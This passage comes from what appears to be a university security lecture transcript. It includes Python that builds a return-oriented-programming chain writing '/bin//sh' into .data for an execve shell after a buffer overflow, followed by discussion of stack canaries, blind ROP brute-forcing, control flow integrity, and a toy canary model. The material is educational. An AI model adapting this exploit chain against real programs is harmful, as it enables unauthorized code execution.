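# Addresses quoted in the lecture.
DATA = 0x080EA060      # start of .data (fixed, writable)
POP_EDX = 0x0806E91A   # pop edx ; ret
WRITE = 0x0809A67D     # mov dword ptr [edx], eax ; ret
# Placeholders (assumptions): not clearly given in the recording.
POP_EAX = 0x11111111   # hypothetical address of pop eax ; ret
XOR_EAX = 0x22222222   # hypothetical address of xor eax, eax ; ret


def addr(value: int) -> bytes:
    """Pack a 32-bit value as little-endian bytes."""
    return pack("<I", value)


def write_word(where: int, what: bytes) -> bytes:
    """Chain fragment: store the 4 bytes `what` at address `where`."""
    return addr(POP_EDX) + addr(where) + addr(POP_EAX) + what + addr(WRITE)


def write_zero(where: int) -> bytes:
    """Chain fragment: store a 32-bit zero without zero bytes in the payload."""
    return addr(POP_EDX) + addr(where) + addr(XOR_EAX) + addr(WRITE)


chain = b""
chain += write_word(DATA, b"/bin")           # "/bin" at .data
chain += write_word(DATA + 4, b"//sh")       # "//sh" at .data + 4
chain += write_zero(DATA + 8)                # null terminator
chain += write_word(DATA + 12, addr(DATA))   # argv[0] = address of the string
chain += write_zero(DATA + 16)               # argv[1] = null

# 50 a's, 4 filler bytes over saved EBP (arbitrary), then the chain over saved EIP.
p = b"a" * 50 + b"bbbb" + chain


def simulate(rop: bytes) -> dict:
    """Tiny model of the four gadgets: returns {address: 4 bytes written}."""
    mem, regs, sp = {}, {"eax": 0, "edx": 0}, 0

    def pop() -> int:
        nonlocal sp
        word = rop[sp:sp + 4]
        sp += 4
        return int.from_bytes(word, "little")

    while sp < len(rop):
        gadget = pop()  # each ret pops the next gadget address
        if gadget == POP_EDX:
            regs["edx"] = pop()
        elif gadget == POP_EAX:
            regs["eax"] = pop()
        elif gadget == XOR_EAX:
            regs["eax"] = 0
        elif gadget == WRITE:
            mem[regs["edx"]] = regs["eax"].to_bytes(4, "little")
        else:
            raise ValueError(hex(gadget))
    return mem


mem = simulate(chain)
image = b"".join(mem[a] for a in sorted(mem))
print(image)
```

Wrapping each write in a helper keeps the pop edx, pop eax, write ordering in one place, which is the part that is easiest to get wrong by hand.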
No, not quite, that would be a terrible pointer. We need to put that in edx. Yes, we need to put that address in edx. So now we need to set up our call to execve. We have all the data in memory, everything's all set up at fixed memory locations, and now we can call execve. Remember, we want to call execve with the address of .data, the address of .data plus 12, and the address of .data plus 8. Plus 8 points to that 0, so it's going to be an environment pointer that's null. ebx is the first argument to execve, so we do a pop ebx gadget, which is going to put 0x080EA060 into ebx. ecx is the next one, so we use our pop ecx gadget and we put the address of .data plus 0xc in there. edx is the third argument, the environment pointer, so we put ...068, the address of .data plus 8. And then eax needs to be 11, so how are we going to do that? Zero it out, and then do what? Increment it 11 times. You could maybe try to search for a gadget that moves 11 in there, you could try whatever, but incrementing will get us to 11 as long as there are no restrictions on the length of your input; that's one of the things you need to think about. Now we call int 0x80, and then we print out our payload. This is going to be the payload to our program. Actually, I mean, it's tedious, but it's still roughly on the order of writing our own shellcode; it's not super crazy. So now we can run this. Maybe somebody with a really good memory can tell what's the difference: what did I change about how the program is executed between this and the other ones? Double quotes. Why do I need those? Yeah, because this payload, not shellcode, this payload has whitespace characters like a horizontal tab in it, and so if you do it without double quotes it'll run, but the shell will pass multiple arguments and completely mess things up. That took me like a half hour to figure out what was wrong. So I get stuck on these things too. I
present it to you like this is just how it is, but I struggle with this stuff too. So double quotes are super important and super necessary here; literally, this example will not work without them. We're going to want to set our breakpoint right before the leave, so you can see where we are on the stack, right before the leave. I'm not even showing the a's on the stack, right? We've already done our overflow, and we're going to walk through this very quickly. So we return, and now we start executing from our first gadget. These are all the different gadgets in memory; they obviously are not next to each other, and I've literally just put space between them to separate them. It's wonderful. Okay, so we pop edx and put ...060 in there. We return to a gadget that pops eax, and we put this value into eax, so this is now "/bin". We then copy that value to this memory address, ...060. And if you're wondering, yes, it was just as tedious for me to make these slides as it is for you to watch them, but I think it's important to actually understand the flow of what's going on here and the relation between the code that we created and what's actually going on. So now we write out the next one; this would be "//sh". We can actually maybe start to decode that: 0x2f is slash, so this is "//sh". We move that there. Then we pop the next value, ...068, into edx, and we xor eax, so we zero that out, and write it at the address of .data plus 8. Then we return, and now we pop the next address into edx. So we still have a ton more to go, but it's actually not that large; think about it, it's like 40 steps, but for arbitrary computation this is pretty cool. So now we're returning here to pop eax, and now we are moving. This is the important part: this is where we're setting up the argv vector. We're copying 0x080EA060 to ...06C, so we're setting things up correctly. Pop
in there, xor eax, now we're zeroing that out, so here we just move 0 to ...070, which is .data plus 16 bytes. And now we've got all our fun stuff. So now we've popped ebx, so we're setting up ebx; we've returned, we're popping ecx, and we've returned; and now we've popped edx. So now three of our registers, ebx, ecx, edx, are all set up with the values that we want: ebx points to the string "/bin//sh"; ecx points to a memory location, and at that memory location is the address of the string "/bin//sh" followed by 0; and the environment pointer just points to a null pointer. Now we're xoring eax, then we've got 11 increment instructions, which, trust me, will get it up to 11. We get up to here on the stack, we then return from there to the int 0x80, we call this, and we're trying to get a shell. We can actually see, before we actually get this shell, at the int 0x80, that at the memory location is the string "/bin//sh". It's important that it's null terminated, because gdb is checking for that when I print out the string. We can look at 0x080EA06C, we can look at two values, and we'll see at this memory location, because this is our argv pointer, that there is a pointer here: there's the memory address of "/bin//sh" followed by 0. And edx points at 0. We can continue, and we'll actually execute a new program. So we've essentially done execve with this string, this argument vector, and a null environment; actually, technically this is an empty array or whatever. So this is a ROP payload for this program that is fully ASLR-proof: it doesn't matter how much ASLR is applied to this program, we will be able to execute any arbitrary computation and any commands from here. There's an important point: you may think that we could skip this argv and make it null, that it was an optional step. And I'll tell you, we were doing a capture-the-flag competition, I think it was DEF CON quals, and I'd been working on this program for like three or
four hours, and I got to the point where I had a ROP payload and it was working on my machine, like you would do, just using gdb. I had to run it on their system and it wouldn't work, and I was literally pulling my hair out. I think it took me another two hours to realize I was passing null as the second argument, which should work, it would be no argument vector, but on that particular operating system, if /bin/sh was executed with no argv parameters, it would terminate. And so when I changed it to be something like this, it took more work, but it actually worked. So this is why I'm doing it this way and not another way. Questions about this? Yeah. Is there a reason .data isn't controlled by ASLR, why it doesn't actually randomize .data? Yeah, I believe it's because the code segment is not randomized, and the code segment is using the .data segment for global variables. Any global variable you have will be located in the .data segment, so when you need to reference it in the code you need to reference the full address. That's probably not worth targeting, is the short version. You may be able to do something with the gadgets that are there, but it would take you looking at the gadgets by hand and trying to figure it out. So, to lift your spirits, there are automated tools to find the gadgets, so you don't actually have to do it by hand. To be fully honest, that's how I made this example: I ran this tool on it and it gave me the gadgets. And I'd say pwntools: if you want to look at a library to do this stuff competitively, pwntools is a fantastic library that has all kinds of cool payload generation, ROP gadget finding tools, all kinds of super cool stuff. Almost all of the top CTF teams use pwntools to write exploits. ROPgadget is the tool that I use, which is really good for finding gadgets: it will show you all the gadgets in the program so you can look to see what's useful. And definitely ROPgadget has it, I think pwntools may have it too: they will automatically build the ROP
chain for you. So they will analyze all the gadgets, try to find a write-what-where gadget, and then try to find the right pops and stuff, and create the whole thing for you automatically. So, super cool. So is this it? Are we done? Should we just give up? Time to go home, we can't possibly stop these memory corruption attacks, the attackers are just too smart? What made this attack possible? Part of it, yeah: your input could be as long as you want. As long as you want to do what? Why would I need my input to be really long? What was the first domino in that whole chain? Saved EIP. Still, fundamentally, I overflow saved EIP. So an idea is, hey, let's try to prevent overflowing saved EIP. One way is canaries. Canaries were an older technique where the idea was, hey, let's put something on the stack before saved EIP, and then we'll check it before the function returns and make sure that the canary value is still there before returning. So StackGuard is one way to do that. There are all kinds of different canaries, and the idea is the compiler changes the epilogue so that every time a return instruction is about to be performed, it checks the canary and makes sure that the canary is valid. So the code needs to be recompiled, so it doesn't work on old binaries, and it introduces overhead, which means some people don't actually use them. So -fstack-protector and -fno-stack-protector: these are the flags that enable or disable canaries on Linux. So now we're going to think game over, right?
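As a rough illustration of the canary idea, here is a toy model in Python rather than real compiler output. The frame layout (50-byte buffer, then a 4-byte canary, then saved EBP and saved EIP), the helper names, and the `EBP_`/`EIP_` filler values are all assumptions made for this sketch.

```python
import os

BUF_SIZE = 50
CANARY = os.urandom(4)  # chosen once, at "program start"


def make_frame() -> bytearray:
    """Model a stack frame from low to high: buffer, canary, saved EBP, saved EIP."""
    return bytearray(BUF_SIZE) + bytearray(CANARY) + b"EBP_" + b"EIP_"


def copy_unchecked(frame: bytearray, data: bytes) -> None:
    """Like an unchecked strcpy: writes from the start of the buffer upward."""
    frame[:len(data)] = data


def canary_intact(frame: bytearray) -> bool:
    """The check added to the function epilogue, run before the return."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + 4]) == CANARY


# Input that fits in the buffer leaves the canary alone.
ok = make_frame()
copy_unchecked(ok, b"a" * 50)

# An overflow that reaches saved EIP has to run over the canary on the way.
smashed = make_frame()
copy_unchecked(smashed, b"a" * 58 + b"\x1a\xe9\x06\x08")

print(canary_intact(ok), canary_intact(smashed))
```

The first frame passes the check. The second fails it even though saved EIP now holds the attacker's address, because the overflow had to write through the canary to get there (barring the negligible chance that the random canary happens to equal the filler bytes).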
There's no possibility we can do this. Except, well, there's two things. If we can guess the canary, we can overwrite it with the correct value, right? And fundamentally we can still sometimes overwrite other parts of the function frame: if the canary only protects saved EIP and not saved EBP, then we can overwrite saved EBP, and as we saw, we can use that to shift the stack and control everything. So it's game over again. Of course, some very smart people came up with this approach called BROP, which stands for blind return-oriented programming, which works against a target server, so let's say a web server that has a buffer overflow and has canaries. Essentially the idea is, when you do an overflow, you only change one byte of the canary value. The other thing I should say: canary values don't change between different requests to the program; usually the canary value is randomly determined on startup and then that value is used. So the idea is, if I'm able to write onto the stack and I can overwrite one byte of the canary value, I can try 0 to 255, and one of those will work; the rest of them will crash the program. So I brute force one byte of the canary, and then I can do it again with at most another 256 tries and get the second byte, the third byte, the fourth byte. That way I can break the canary. And this paper and these tools actually show you how, from there, you can do a blind ROP attack and figure out gadgets in a completely blind manner, which requires a lot of requests but still actually works. So this should terrify you. Nothing to save us except for control flow integrity. So the idea here, I'm trying to get through this so we can start on the next one. Control flow integrity: the central idea here is that the problem in all these attacks is the jump from the return of my function to the start of system; the program never intended that control flow. If you think about all the paths through the program, there's only a fixed number of
control flows. So it's actually a super old idea, from 2005, that says, hey, every time there's a return or a start of a function, check where you're going or where you came from to make sure that it was actually intended by the program. So that's control flow integrity, essentially. It turns out that even if you have perfect control flow integrity, there's still enough dynamic stuff that can go on: there's a paper called control-flow breaking, I believe, or control-flow bending, where even by going through the program graph in the exact right control flow order you can cause arbitrary computation to happen and have basically the same effect as a ROP attack. So everything's horrible. And just so you can't say you've taken a security class and never heard about Metasploit: Metasploit is a tool that has a lot of known attacks for known systems. You can download this, you can actually run and shoot exploits at various systems. It's free, it's kind of cool. And Kali Linux, it still is Kali, right? Did they change the name or something? It still is, right. So this is a Linux distribution that's actually very cool, that you can install and play with, that has all these security tools pre-installed: it has Metasploit, it has literally any kind of scanning tool, Wireshark, the packet capture tools that we talked about. Okay, so in conclusion: you should be terrified, nothing works. You can exploit applications by providing unexpected inputs and generating unexpected environmental conditions. You must sanitize user input. As a developer it's on you to be aware of the potential security problems with your system. So the idea is safety: you know you can't code securely 100% of the time, no one person can and no team can, so you need to think about safe ways of coding, safe languages, and using existing protection mechanisms to try to mitigate risk as much as you can. Even if you do all that, to completely turn around, you still have problems with the application's logic. So still, like we said, if you still have
a coupon system that allows you to use a coupon and keep using it enough times to reduce the price to free, that's still a vulnerability in your application. It's not a memory corruption vulnerability; it's a problem with your application's logic. So this is your job as a security analyst: to understand and look at each program adversarially. That's why the homework you're doing now is so important, because you're looking at each level and thinking, how can I break this, using every possible way you can. This is what you have to do when you're looking at an application: how can I break this? How can I make it do what it's not supposed to do? Alright, thanks. Is this the last homework assignment, or the final thing? Cool, alright, we're going to start on that next week.